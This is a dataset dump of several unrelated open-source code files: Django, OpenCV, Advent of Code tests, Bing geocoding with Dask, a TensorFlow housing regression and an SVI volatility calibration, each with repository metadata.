blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
281
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 6
116
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 313
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 18.2k
668M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
38.2k
| gha_license_id
stringclasses 17
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 107
values | src_encoding
stringclasses 20
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 4
6.02M
| extension
stringclasses 78
values | content
stringlengths 2
6.02M
| authors
listlengths 1
1
| author
stringlengths 0
175
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5c88190ae443b4fec8426fb3e97aa3b52ac51b19
|
3ac7e1ec8c3551b449e10c43c76e44d285462502
|
/manage.py
|
24c38809017765d996b7094cdc22bfd076324a4c
|
[] |
no_license
|
slayyy/render-manager
|
612ea2c2e611875df7b453a177401ecfeeb9962d
|
efbcf6f2b30061bfa14bb22994e0029e73691896
|
refs/heads/master
| 2022-05-08T23:45:14.461612
| 2019-10-27T17:19:52
| 2019-10-27T17:19:52
| 215,014,775
| 0
| 0
| null | 2022-04-22T22:33:52
| 2019-10-14T10:31:53
|
Python
|
UTF-8
|
Python
| false
| false
| 634
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "render_manager.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == "__main__":
main()
|
[
"decobert.a78@gmail.com"
] |
decobert.a78@gmail.com
|
005b11fedd1241560633f3f19ce4ab82b6cf9068
|
43dabf77afd5c44d55b465c1b88bf9a5e7c4c9be
|
/resize.py
|
306400848b45f96d2ec9be96bbc1dbae1a9871f7
|
[] |
no_license
|
geegatomar/OpenCV-Computer-Vision-Adrian-Rosebrock
|
cc81a990a481b5e4347dd97369b38479b46e55bc
|
daa579309010e6e7fefb004b878ffb26374401d0
|
refs/heads/master
| 2022-11-18T13:07:08.040483
| 2020-07-20T01:55:39
| 2020-07-20T01:55:39
| 280,987,262
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 506
|
py
|
import cv2
import argparse
import numpy as np
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True, help="Path of image")
ap.add_argument("-w", "--width", default=100, help="Width of resized img")
args = vars(ap.parse_args())
image = cv2.imread(args["image"])
width = int(args["width"])
ratio = width / image.shape[1]
dim = (int(ratio * image.shape[0]), width)
resized = cv2.resize(image, dim, interpolation = cv2.INTER_AREA)
cv2.imshow("Resized img", resized)
cv2.waitKey(0)
|
[
"geegatomar@gmail.com"
] |
geegatomar@gmail.com
|
2bd8ed87c34f5106c1bf3d36425d3ecae107c5ea
|
43f5332bfc67e67ddb1e52e7eae40306ce7ef1e2
|
/12/tests.py
|
a072532fc33103350a0c1c5c0b21149b8b84a7d9
|
[
"MIT"
] |
permissive
|
remihuguet/aoc2020
|
943d9713c5edf2a80aa9e11a46d89ad3ef72b88c
|
c313c5b425dda92d949fd9ca4f18ff66f452794f
|
refs/heads/main
| 2023-04-13T05:07:31.317561
| 2021-03-30T20:36:48
| 2021-03-30T20:36:48
| 317,330,148
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,326
|
py
|
import rainrisk
def test_compute_new_direction():
direction = (1, 0)
assert (0, -1) == rainrisk.compute_new_direction(direction, 'R90')
assert (0, 1) == rainrisk.compute_new_direction(direction, 'L90')
assert (-1, 0) == rainrisk.compute_new_direction(direction, 'R180')
assert (-1, 0) == rainrisk.compute_new_direction(direction, 'L180')
assert (0, 1) == rainrisk.compute_new_direction(direction, 'R270')
assert (0, -1) == rainrisk.compute_new_direction(direction, 'L270')
assert (1, 0) == rainrisk.compute_new_direction(direction, 'R360')
assert (1, 0) == rainrisk.compute_new_direction(direction, 'L360')
direction = (0, 1)
assert (1, 0) == rainrisk.compute_new_direction(direction, 'R90')
assert (-1, 0) == rainrisk.compute_new_direction(direction, 'L90')
assert (0, -1) == rainrisk.compute_new_direction(direction, 'R180')
assert (0, -1) == rainrisk.compute_new_direction(direction, 'L180')
assert (-1, 0) == rainrisk.compute_new_direction(direction, 'R270')
assert (1, 0) == rainrisk.compute_new_direction(direction, 'L270')
assert (0, 1) == rainrisk.compute_new_direction(direction, 'R360')
assert (0, 1) == rainrisk.compute_new_direction(direction, 'L360')
def test_compute_final_position():
with open('12/test_input.txt', 'r') as f:
mvts = f.readlines()
assert (17, -8) == rainrisk.compute_final_position(mvts)
def test_compute_manhattan():
assert 25 == rainrisk.compute_manhattan('12/test_input.txt')
def test_compute_position_waypoint():
with open('12/test_input.txt', 'r') as f:
mvts = f.readlines()
initial = (10, 1)
assert (214, -72) == rainrisk.compute_position_waypoint(mvts, initial)
def test_compute_final_manhattan():
assert 286 == rainrisk.compute_final_manhattan('12/test_input.txt')
def test_compute_speed_rotation():
speed = (10, 1)
assert (1, -10) == rainrisk.compute_speed_rotation(speed, 'R90')
assert (-1, 10) == rainrisk.compute_speed_rotation(speed, 'L90')
assert (-10, -1) == rainrisk.compute_speed_rotation(speed, 'R180')
assert (-10, -1) == rainrisk.compute_speed_rotation(speed, 'L180')
assert (-1, 10) == rainrisk.compute_speed_rotation(speed, 'R270')
assert (1, -10) == rainrisk.compute_speed_rotation(speed, 'L270')
|
[
"remi.huguet@gmail.com"
] |
remi.huguet@gmail.com
|
4c61a7aae73fa64897e0df01720f5f1eed93b6dd
|
16de2efcba33961633c1e63e493986bad54c99bd
|
/test.py
|
73b7e8d90f6b8b0378a1486d70f70ac2af704483
|
[] |
no_license
|
thakur-nishant/Algorithms
|
a0cc45de5393d4cbb428cccdbf81b6937cdf97d7
|
1a0306ca9a9fc68f59e28ea26c24822c15350294
|
refs/heads/master
| 2022-01-07T22:22:09.764193
| 2019-05-17T20:10:24
| 2019-05-17T20:10:24
| 109,093,687
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 424
|
py
|
from math import log
from random import random
import matplotlib.pyplot as plt
import numpy as np
l = 2
T = 24
curr = -1/l * log(random())
arrival = [curr]
while curr < T:
curr = curr -1/l * log(random())
arrival.append(curr)
arrival = arrival[1:]
t = np.arange(0.0, T, 0.01)
N = len(t)
X = np.zeros(N)
for i in range(N):
X[i] = np.sum(arrival <= t[i])
plt.plot(t, X)
plt.xlabel('time(hrs)')
plt.show()
|
[
"nt.nishantt@gmail.com"
] |
nt.nishantt@gmail.com
|
6dcdc505bde9ee4996f62e4c6d83879c0f9d77ab
|
1d4cdffde9e2cf750b0fbe0cc06f4f4455393762
|
/Chapter09/Python/02-geocoding-parallel-with-python.py
|
ad3faa246f40c105739ee455cf75e592df013813
|
[
"MIT"
] |
permissive
|
ndarvishev/Extending-Power-BI-with-Python-and-R
|
59b3a82bb7bf863756c71d8bff11c41ad9164fe3
|
d52b7064128ff086c315335d780df3dde1fb13d5
|
refs/heads/main
| 2023-07-20T07:27:22.377184
| 2021-09-05T14:29:09
| 2021-09-05T14:29:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,343
|
py
|
# %%
import os
import requests
import urllib
import json
import pandas as pd
import dask.dataframe as dd
import time
# %%
def bing_geocode_via_address(address):
# trim the string from leading and trailing spaces using strip
full_url = f"{base_url}query={urllib.parse.quote(address.strip(), safe='')}?key={AUTH_KEY}"
r = requests.get(full_url)
try:
data = r.json()
# number of resources found, used as index to get the
# latest resource
num_resources = data['resourceSets'][0]['estimatedTotal']
formattedAddress = data['resourceSets'][0]['resources'][num_resources-1]['address']['formattedAddress']
lat = data['resourceSets'][0]['resources'][num_resources-1]['point']['coordinates'][0]
lng = data['resourceSets'][0]['resources'][num_resources-1]['point']['coordinates'][1]
except:
num_resources = 0
formattedAddress = None
lat = None
lng = None
text = r.text
status = r.reason
url = r.url
return num_resources, formattedAddress, lat, lng, text, status, url
def enrich_with_geocoding(passed_row, col_name):
# Fixed waiting time to avoid the "Too many requests" error
# as basic accounts are limited to 5 queries per second
time.sleep(3)
address_value = str(passed_row[col_name])
num_resources, address_formatted, address_lat, address_lng, text, status, url = bing_geocode_via_address(address_value)
#passed_row.reset_index(drop=True, inplace=True)
passed_row['numResources'] = num_resources
passed_row['formattedAddress'] = address_formatted
passed_row['latitude'] = address_lat
passed_row['longitude'] = address_lng
passed_row['text'] = text
passed_row['status'] = status
passed_row['url'] = url
return passed_row
# %%
####################################################################################################
# To be set up separately for security reasons
####################################################################################################
os.environ['BINGMAPS_API_KEY'] = '<your-api-key>'
####################################################################################################
base_url= "http://dev.virtualearth.net/REST/v1/Locations/"
AUTH_KEY = os.environ.get('BINGMAPS_API_KEY')
# %%
ddf_orig = dd.read_csv(r'D:\LZavarella\OneDrive\MVP\PacktBook\Code\Extending-Power-BI-with-Python-and-R\Chapter09\geocoding_test_data.csv',
encoding='latin-1')
ddf = ddf_orig[['full_address','lat_true','lon_true']]
ddf.npartitions
# %%
ddf = ddf.repartition(npartitions=os.cpu_count()*2)
ddf.npartitions
# %%
enriched_ddf = ddf.apply(enrich_with_geocoding, axis=1, col_name='full_address',
meta={'full_address': 'string', 'lat_true': 'float64', 'lon_true': 'float64',
'numResources': 'int32', 'formattedAddress': 'string',
'latitude': 'float64', 'longitude': 'float64', 'text': 'string',
'status': 'string', 'url': 'string'})
tic = time.perf_counter()
enriched_df = enriched_ddf.compute()
toc = time.perf_counter()
print(f'{enriched_df.shape[0]} addresses geocoded in {toc - tic:0.4f} seconds')
# %%
enriched_df
# %%
|
[
"lucazavarella@outlook.com"
] |
lucazavarella@outlook.com
|
4481446207abde7e6ba8f0c16de738b7d78e0e02
|
2a7b79c98aa6f8b36a68c96937cd8f4577ff48be
|
/neural_network/californiaHousingNeuralNet1.py
|
2a8956b56cc13ec401ebb1d7395c90045c79c2f1
|
[] |
no_license
|
Utlak88/California-Housing-Dataset
|
6935a207e465d48e3fcef2930d8e65bc7d9c4c99
|
6aae815d323e39d041586fdc54da6c7f83809995
|
refs/heads/main
| 2023-02-01T16:37:53.305730
| 2020-12-23T07:40:25
| 2020-12-23T07:40:25
| 323,824,418
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,676
|
py
|
# Neural network based on the Google Machine Learning Crash Course
################################################################################
# Importing modules
import numpy as np
import pandas as pd
import tensorflow as tf
from sklearn import metrics
from sklearn.model_selection import train_test_split
from matplotlib import pyplot as plt
print("Imported modules.")
################################################################################
################################################################################
# Defining functions for model as well as data visualizations
def plot_the_loss_curve(epochs, mse):
"""Plot a curve of loss vs. epoch."""
plt.figure()
plt.xlabel("Epoch")
plt.ylabel("Mean Squared Error")
plt.plot(epochs, mse, label="Loss")
plt.legend()
plt.ylim([mse.min() * 0.95, mse.max() * 1.03])
plt.show()
print("Defined function to generate curve of loss vs epoch.")
def plot_r_squared_comparison(y_test, y_predict, title):
"""Produce R-squared plot to evaluate quality of model prediction of test data."""
r_squared = metrics.r2_score(y_predict, y_test)
plt.scatter(y_test, y_predict)
plt.xlabel("Normalized Actual Values")
plt.ylabel("Normalized Predicted Values")
plt.title(title)
plt.plot(
np.unique(y_test),
np.poly1d(np.polyfit(y_test, y_predict, 1))(np.unique(y_test)),
)
x_r2_label_placement = pd.Series(y_test).median() - 1.2 * pd.Series(y_test).std()
y_r2_label_placement = (
pd.Series(y_predict).median() + 3 * pd.Series(y_predict).std()
)
plt.text(
x_r2_label_placement,
y_r2_label_placement,
"R-squared = {0:.2f}".format(r_squared),
)
plt.show()
print("Defined function to generate R-squared plot.")
def create_model(my_learning_rate, my_feature_layer):
"""Create and compile a simple linear regression model."""
model = tf.keras.models.Sequential()
model.add(my_feature_layer)
model.add(
tf.keras.layers.Dense(
units=20,
activation="relu",
kernel_regularizer=tf.keras.regularizers.l2(0.04),
name="Hidden1",
)
)
model.add(
tf.keras.layers.Dense(
units=12,
activation="relu",
kernel_regularizer=tf.keras.regularizers.l2(0.04),
name="Hidden2",
)
)
model.add(tf.keras.layers.Dense(units=1, name="Output"))
model.compile(
optimizer=tf.keras.optimizers.Adam(lr=my_learning_rate),
loss="mean_squared_error",
metrics=[tf.keras.metrics.MeanSquaredError()],
)
return model
def train_model(model, dataset, epochs, label_name, batch_size=None):
"""Train the model by feeding it data."""
features = {name: np.array(value) for name, value in dataset.items()}
label = np.array(features.pop(label_name))
history = model.fit(
x=features, y=label, batch_size=batch_size, epochs=epochs, shuffle=True
)
epochs = history.epoch
# Track the progression of training, gather a snapshot
# of the model's mean squared error at each epoch.
hist = pd.DataFrame(history.history)
mse = hist["mean_squared_error"]
return epochs, mse
print("Defined the create_model and train_model functions.")
################################################################################
################################################################################
# Adjusting the granularity of reporting.
pd.options.display.max_rows = 10
pd.options.display.float_format = "{0:1.3f}".format
################################################################################
################################################################################
# Importing data
train_data = pd.read_csv(
"https://download.mlcc.google.com/mledu-datasets/california_housing_train.csv"
)
# shuffle the examples
train_data = train_data.reindex(np.random.permutation(train_data.index))
test_data = pd.read_csv(
"https://download.mlcc.google.com/mledu-datasets/california_housing_test.csv"
)
print("Imported data.")
################################################################################
################################################################################
# TRAIN FEATURE ENGINEERING (PART 1)
# Defining variable for use to assign column values to column variables
# data = train_data
# # Initially defining column variables
# (
# longitude,
# latitude,
# housing_median_age,
# total_rooms,
# total_bedrooms,
# population,
# households,
# median_income,
# median_house_value,
# ) = range(0, len(data.columns))
# # Assigning column values to column variables
# dict_for_columns = {}
# for x in range(0, len(data.columns)):
# dict_for_columns[data.columns[x]] = data[data.columns[x]]
# # Defining column variables for use in data analysis
# globals().update(dict_for_columns)
# # Visualizing data
# # train_data.hist(figsize=[20,13])
# # train_data.boxplot(figsize=[20,13])
# # train_data.drop('median_house_value',axis=1).boxplot(figsize=[20,13])
# # Clipping outliers
# total_rooms[total_rooms > 6000] = 6000
# train_data[train_data.columns[3]] = total_rooms
# total_bedrooms[total_bedrooms > 1300] = 1300
# train_data[train_data.columns[4]] = total_bedrooms
# population[population > 3000] = 3000
# train_data[train_data.columns[5]] = population
# households[households > 1250] = 1250
# train_data[train_data.columns[6]] = households
# median_income[median_income > 8.5] = 8.5
# train_data[train_data.columns[7]] = median_income
# print("Clipped train features.")
# Z-Score Normalizing
# columns_for_normalizing = train_data[train_data.columns[0:9]]
# normalized_columns = (
# columns_for_normalizing - columns_for_normalizing.mean()
# ) / columns_for_normalizing.std()
# train_data[normalized_columns.columns] = normalized_columns
# print("Normalized train features.")
# # Revisualizing data
# # train_data.hist(figsize=[20,13])
# # train_data.drop('median_house_value',axis=1).boxplot(figsize=[20,13])
# # Adding new feature calculating the ratio of total bedrooms to total rooms
# train_data["rooms_ratio"] = train_data["total_bedrooms"] / train_data["total_rooms"]
# print("Added new train data feature calculating the ratio of total bedrooms to total rooms.")
################################################################################
################################################################################
# TEST FEATURE ENGINEERING (PART 1)
# Defining variable for use to assign column values to column variables
# data = test_data
# # Initially defining column variables
# (
# longitude,
# latitude,
# housing_median_age,
# total_rooms,
# total_bedrooms,
# population,
# households,
# median_income,
# median_house_value,
# ) = range(0, len(data.columns))
# # Assigning column values to column variables
# dict_for_columns = {}
# for x in range(0, len(data.columns)):
# dict_for_columns[data.columns[x]] = data[data.columns[x]]
# # Defining column variables for use in data analysis
# globals().update(dict_for_columns)
# # Visualizing data
# # test_data.hist(figsize=[20,13])
# # test_data.boxplot(figsize=[20,13])
# # test_data.drop('median_house_value',axis=1).boxplot(figsize=[20,13])
# # Clipping outliers
# total_rooms[total_rooms > 6000] = 6000
# test_data[test_data.columns[3]] = total_rooms
# total_bedrooms[total_bedrooms > 1300] = 1300
# test_data[test_data.columns[4]] = total_bedrooms
# population[population > 3000] = 3000
# test_data[test_data.columns[5]] = population
# households[households > 1250] = 1250
# test_data[test_data.columns[6]] = households
# median_income[median_income > 8.5] = 8.5
# test_data[test_data.columns[7]] = median_income
# print("Clipped test features.")
# Z-Score Normalizing
# columns_for_normalizing = test_data[test_data.columns[0:9]]
# normalized_columns = (
# columns_for_normalizing - columns_for_normalizing.mean()
# ) / columns_for_normalizing.std()
# test_data[normalized_columns.columns] = normalized_columns
# print("Normalized test features.")
# # Revisualizing data
# # test_data.hist(figsize=[20,13])
# # test_data.drop('median_house_value',axis=1).boxplot(figsize=[20,13])
# # Adding new feature calculating the ratio of total bedrooms to total rooms
# test_data["rooms_ratio"] = test_data["total_bedrooms"] / test_data["total_rooms"]
# print("Added new test data feature calculating the ratio of total bedrooms to total rooms.")
################################################################################
################################################################################
# FEATURE ENGINEERING (PART 2)
# Create an empty list that will eventually hold all created feature columns.
# feature_columns = []
# # Establishing resolution by Zs
# resolution_in_Zs = 0.3 # 3/10 of a standard deviation.
# # Create a bucket feature column for latitude.
# latitude_as_a_numeric_column = tf.feature_column.numeric_column("latitude")
# latitude_boundaries = list(
# np.arange(
# int(min(train_data["latitude"])),
# int(max(train_data["latitude"])),
# resolution_in_Zs,
# )
# )
# latitude = tf.feature_column.bucketized_column(
# latitude_as_a_numeric_column, latitude_boundaries
# )
# # Create a bucket feature column for longitude.
# longitude_as_a_numeric_column = tf.feature_column.numeric_column("longitude")
# longitude_boundaries = list(
# np.arange(
# int(min(train_data["longitude"])),
# int(max(train_data["longitude"])),
# resolution_in_Zs,
# )
# )
# longitude = tf.feature_column.bucketized_column(
# longitude_as_a_numeric_column, longitude_boundaries
# )
# # Create a feature cross of latitude and longitude.
# latitude_x_longitude = tf.feature_column.crossed_column(
# [latitude, longitude], hash_bucket_size=100
# )
# crossed_feature = tf.feature_column.indicator_column(latitude_x_longitude)
# feature_columns.append(crossed_feature)
# # Represent median_income as a floating-point value.
# median_income = tf.feature_column.numeric_column("median_income")
# feature_columns.append(median_income)
# # Represent population as a floating-point value.
# population = tf.feature_column.numeric_column("population")
# feature_columns.append(population)
# # Convert the list of feature columns into a layer that will later be fed into the model.
# my_feature_layer = tf.keras.layers.DenseFeatures(feature_columns)
################################################################################
################################################################################
# TRAINING AND EVALUATING MODEL
# The following variables are the hyperparameters.
learning_rate = 0.005
epochs = 200
batch_size = 1000
label_name = "median_house_value"
# Establish model topography.
my_model = create_model(learning_rate, my_feature_layer)
# Train the model on the normalized training set.
epochs, mse = train_model(my_model, train_data, epochs, label_name, batch_size)
plot_the_loss_curve(epochs, mse)
test_features = {name: np.array(value) for name, value in test_data.items()}
test_label = np.array(test_features.pop(label_name)) # isolate the label
print("\n Evaluate the new model against the test set:")
my_model.evaluate(x=test_features, y=test_label, batch_size=batch_size)
################################################################################
################################################################################
# Predicting data using trained model
predicted_values = np.squeeze(my_model.predict(test_features))
print("Predicted data using model.")
################################################################################
################################################################################
# Plotting comparison of predicted to test data in form of R-squared plot
print("Generating R-squared plot to evaluate quality of model prediction of test data.")
plot_r_squared_comparison(
test_label,
predicted_values,
"California Median House Value Prediction Quality\nNo Feature Engineering",
)
################################################################################
|
[
"noreply@github.com"
] |
noreply@github.com
|
0fcc5a13fd81c3f9c2206bd9e4d9545b3032f2f3
|
7954a82026c982aba15c5195317fb49231cc6937
|
/code/SSVIUnconstrained.py
|
5f23dfa3b6d45d64e1b951977f0ee1677293ac2b
|
[
"BSD-3-Clause"
] |
permissive
|
mChataign/Beyond-Surrogate-Modeling-Learning-the-Local-Volatility-Via-Shape-Constraints
|
81c7f2639e9ac3d57d2c29ba10be0596a6514ce9
|
63304824c5775927b7495383ec2c9cd0277e5845
|
refs/heads/Marc/GP
| 2023-05-25T04:48:45.665335
| 2021-06-15T10:06:59
| 2021-06-15T10:06:59
| 314,231,951
| 17
| 10
|
BSD-3-Clause
| 2021-04-14T17:20:15
| 2020-11-19T11:48:47
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 39,035
|
py
|
import numpy as np
import pandas as pd
import scipy
import matplotlib.pyplot as plt
import scipy.optimize as opt
from sklearn.metrics import mean_squared_error
from datetime import datetime
from scipy.optimize import minimize
from scipy import integrate
import BS
import bootstrapping
import sys, os
import time
impliedVolColumn = BS.impliedVolColumn
"""
Implementation is adapted from a proposal of Tahar Ferhati partially based on his work :
"Ferhati, T. (2020). Robust Calibration For SVI Model Arbitrage Free. Available at SSRN 3543766.".
"""
##################################################################################### Final calibration
# ============ SVI Functions ==================================================
# Attention à l'ordre des paramètres
def SVI(k, a, b , rho, m, sig):
total_variance = a + b*(rho*(k - m) + np.sqrt( (k - m)*(k - m) + sig*sig))
return total_variance
def SVI_two_arguments(theta, k):
a, b , rho, m, sig = theta
return SVI(k, a, b , rho, m, sig)
def fct_least_squares(theta, log_mon, tot_implied_variance):
return np.linalg.norm((SVI_two_arguments(theta, log_mon) - tot_implied_variance), 2)
#================= g(k) function for the convexity test ========================
def test_convexity(k, a, b, rho, m, sig):
square_rt = np.sqrt( (k - m)*(k - m) + sig*sig)
w = SVI(k, a, b, rho, m, sig)
first_der_w = b*rho + b*(k - m) / square_rt
second_der_w = b*sig*sig / (square_rt**3)
g = second_der_w / 2 - first_der_w**2 * (1/w + 1./4) / 4
g = g + ( 1 - k*first_der_w / (2*w) )**2
return g
# Right wing constraints ======================================================
def constraint1(theta, log_mon):
a, b, rho, m, sig = theta
return ((4-a+b*m*(rho+1))*(a-b*m*(rho+1)))-(b*b*(rho+1)*(rho+1))
def constraint2(theta, log_mon):
a, b, rho, m, sig = theta
return 4 -(b*b*(rho+1)*(rho+1))
# Left wing constraints ======================================================
def constraint3(theta, log_mon):
a, b, rho, m, sig = theta
return (((4-a+b*m*(rho-1))*(a-b*m*(rho-1)))-(b*b*(rho-1)*(rho-1)))
def constraint4(theta, log_mon):
a, b, rho, m, sig = theta
return 4-(b*b*(rho-1)*(rho-1))
#==========================================================================
## We check a posteriori the positivity and Slope conditions
# min SVI = a + b*sigma*np.sqrt(1 - rho*rho) positif !
#(1) Right Slope b(rho+1) < 2
#(2) Right Slope b(rho-1) > -2
#==========================================================================
def test_positivity(a, b, rho, sigma):
assert( rho < 1)
assert(rho > -1)
assert(b > 0)
## On vérifie la condition de positivité du minimum
minimum = a + b*sigma*np.sqrt(1 - rho*rho)
assert(minimum > 0)
print("\n Positivity test OK and SVI min is :",minimum)
return 0
def test_slope(b, rho):
right_slope = b * (rho+1)
left_slope = b * (rho -1)
print("\n Right slope is b*(rho+1) < 2 and it's value is: %1.7f" %right_slope)
print("\n Left slope is b*(rho-1) > -2 and it's value is: %1.7f" %left_slope)
assert(right_slope < 2)
assert(left_slope > -2)
pass
##################################################
## Test Positivity of the density function
##################################################
def dminus(x, a,b,rho,m,sigma):
vsqrt = np.sqrt(SVI(x, a,b,rho,m,sigma))
return -x/vsqrt - 0.5*vsqrt
def densitySVI(x, a,b,rho,m,sigma):
dm = dminus(x, a,b,rho,m,sigma)
return test_convexity(x, a,b,rho,m,sigma)*np.exp(-0.5*dm*dm)/np.sqrt(2.*np.pi*SVI(x, a,b,rho,m,sigma))
def generateRandomStartValues(lb=None, ub=None):
# function to generate random initial values for the parameters
lb[~ np.isfinite(lb)] = -1000.0
ub[~ np.isfinite(ub)] = 1000.0
param0 = lb + np.random.rand(size(lb)) * (ub - lb)
return param0
def isAdmissible(x, constraintList):
for constraint in constraintList :
if constraint["fun"](x) < 0.0 :
return False
return True
def generateAdmissibleRandomStartValues(lb=None, ub=None, constraintList = []):
nbIter = 0
x = generateRandomStartValues(lb=lb, ub=ub)
while not isAdmissible(x, constraintList):
x = generateRandomStartValues(lb=lb, ub=ub)
if nbIter >= 10000 :
raise Exception("Too many attempts")
nbIter += 1
return x
def fit_svi(mkt_tot_variance=None,
maturity=None,
log_moneyness=None,
initialGuess=None,
S0=None,
lambdaList = None,
param_slice_before = None):
#############################################################################
# Optimisation Function : min Loss function = ( SVI_model - Variance_Market )
# We can use these bunded opt function : trust-constr , SLSQP, COBYLA
#############################################################################
#=========== SVI’s Parameters Boundaries ======================================
a_low = 1e-6
a_high = np.max(mkt_tot_variance)
b_low = 0.001
b_high = 1
rho_low = -0.999999
rho_high = 0.999999
m_low = 2*np.min(log_moneyness)
m_high = 2*np.max(log_moneyness)
sigma_low = 0.001
sigma_high = 2
#=========== SVI’s Parameters Initial Guess =====================================
a_init = np.min(mkt_tot_variance)/2
b_init = 0.1
rho_init = -0.5
m_init = 0.1
sig_init = 0.1
SVI_param_bounds = ((a_low,a_high),(b_low, b_high),(rho_low,rho_high),(m_low,m_high),(sigma_low,sigma_high))
theta_init = initialGuess
if initialGuess is None :
theta_init = np.array([a_init, b_init, rho_init, m_init, sig_init])
if param_slice_before is not None :
theta_init = fit_svi(mkt_tot_variance=mkt_tot_variance,
maturity=maturity,
log_moneyness=log_moneyness,
initialGuess=initialGuess,
S0=S0,
lambdaList = lambdaList,
param_slice_before = None)
#Constraint Function : g(k) > 0
cons1 = {'type': 'ineq', 'fun': lambda x : lambdaList[0] * constraint1(x , log_moneyness )}
cons2 = {'type': 'ineq', 'fun': lambda x : lambdaList[1] * constraint2(x , log_moneyness )}
cons3 = {'type': 'ineq', 'fun': lambda x : lambdaList[2] * constraint3(x , log_moneyness )}
cons4 = {'type': 'ineq', 'fun': lambda x : lambdaList[3] * constraint4(x , log_moneyness )}
gridPenalization = np.linspace(np.log(0.3),
np.log(3.0),
num=200)
constraintList = [cons1,cons2,cons3,cons4]
if param_slice_before is not None :
def calendarConstraint(theta, mkt_log_mon, param_slice_before):
sliceBefore = SVI_two_arguments(param_slice_before, mkt_log_mon)
sliceCurrent = SVI_two_arguments(theta, mkt_log_mon)
epsilon = 1e-3
#return - np.sqrt(np.mean(np.square(np.clip(sliceBefore - sliceCurrent + epsilon, 0.0, None))))
return - np.mean(np.abs(np.clip(sliceBefore - sliceCurrent + epsilon, 0.0, None)))
cons5 = {'type': 'ineq', 'fun': lambda x : lambdaList[4] * calendarConstraint(x, gridPenalization, param_slice_before)}
constraintList.append(cons5)
#constraintList = []
nbTry = 1#20
parameters = np.zeros((size(theta_init), nbTry))
funValue = np.zeros((nbTry, 1))
for i in range(nbTry):
#param0 = generateRandomStartValues(lb=np.array(list(map(lambda x : x[0], SVI_param_bounds))),
# ub=np.array(list(map(lambda x : x[1], SVI_param_bounds))))
#param0 = generateAdmissibleRandomStartValues(lb=np.array(list(map(lambda x : x[0], SVI_param_bounds))),
# ub=np.array(list(map(lambda x : x[1], SVI_param_bounds))),
# constraintList=constraintList)
result = minimize(lambda x : fct_least_squares(x, log_moneyness, mkt_tot_variance),
theta_init,
method='SLSQP',
bounds=SVI_param_bounds,
constraints=constraintList,
options={'ftol': 1e-9, 'disp': True})
parameters[:, i] = result.x
funValue[i,0] = result.fun
idMin = idxmin(funValue)
# Optimal SVI vector : a*, b*, rho*, m*, sigma*
a_star, b_star, rho_star, m_star, sig_star = parameters[:, idMin[0]]
total_variances_fit = SVI(log_moneyness, a_star, b_star, rho_star, m_star, sig_star)
return parameters[:, idMin[0]]
##################################################################################### Black-scholes
def blsprice(close,
strike,
bootstrap,
tau_interp,
implied_volatility,
optionType) :
cp = optionType
return BS.bs_price(cp, close, strike,
bootstrap.discountIntegral(tau_interp)/tau_interp,
tau_interp, implied_volatility,
bootstrap.dividendIntegral(tau_interp)/tau_interp)
def blsimpv(close,
K_t,
bootstrap,
tau_interp,
optionPrice,
optionType):
maturities = tau_interp * np.ones_like(K_t)
return BS.vectorizedImpliedVolatilityCalibration(close, bootstrap, maturities,
K_t, optionType, optionPrice)
##################################################################################### Utilities
def isempty(l):
return ((l is None) or (numel(l)==0))
def norm(x):
return np.sqrt(np.sum(np.square(x)))
def error(message):
raise Exception(message)
return
def _assert(predicate, message):
assert predicate, message
return
def ismember(elt, l):
return np.isin(elt, l)
def sqrt(x):
return np.sqrt(x)
def sign(x):
return np.sign(x)
def numel(l):
if type(l)==np.float :
return 1
return len(l) if (type(l)==type([]) or type(l)==type(())) else l.size
def ones(shape):
return np.ones(shape)
def size(array, dim = None):
return numel(array) if (dim is None) else array.shape[dim]
def isequal(*args):
return (len(set(args)) <= 1)
def exp(x):
return np.exp(x)
def unique(x):
return np.unique(x)
def zeros(x):
return np.zeros(x)
def idxmin(x):
return np.unravel_index(np.argmin(x), x.shape)
def unsortedUniquePairs(a):
_, idx = np.unique(np.ravel([p[0] for p in a]), return_index=True)
return [a[i] for i in np.sort(idx)]
def interp1(x, v, xq, method, extrapolationMethod):
if method=="linear":
funInter = scipy.interpolate.interp1d(np.ravel(x),
np.ravel(v),
kind=method,
fill_value="extrapolate")
else :
sortedPairs = unsortedUniquePairs([(x,v) for x,v in sorted(zip(np.ravel(x),np.ravel(v)))])
funInter = scipy.interpolate.PchipInterpolator(np.ravel([p[0] for p in sortedPairs]),
np.ravel([p[1] for p in sortedPairs]),
extrapolate=(extrapolationMethod == "extrapolate"))
return funInter(xq)
##################################################################################### Converting SVI parametrization
def svi_convertparameters(param_old=None, _from=None, to=None, tau=None):
#svi_convertparameters converts the parameter set of one type of SVI
#formulation to another. The parameterizations are assumed to be:
# * raw =(a,b,m,rho, sigma)
# * natural = (delta, mu, rho, omega, zeta)
# * jumpwing = (v, psi, p, c, vt)
#
# Input:
# * param_old = (5x1) = original parameters
# * from = string = formulation of original parameters (raw, natural,
# jumpwing)
# * to = string = formulation of new parameters (raw, natural, jumpwings)
#
# Output:
# param_new = (5x1) = new parameters
# test that input is correct
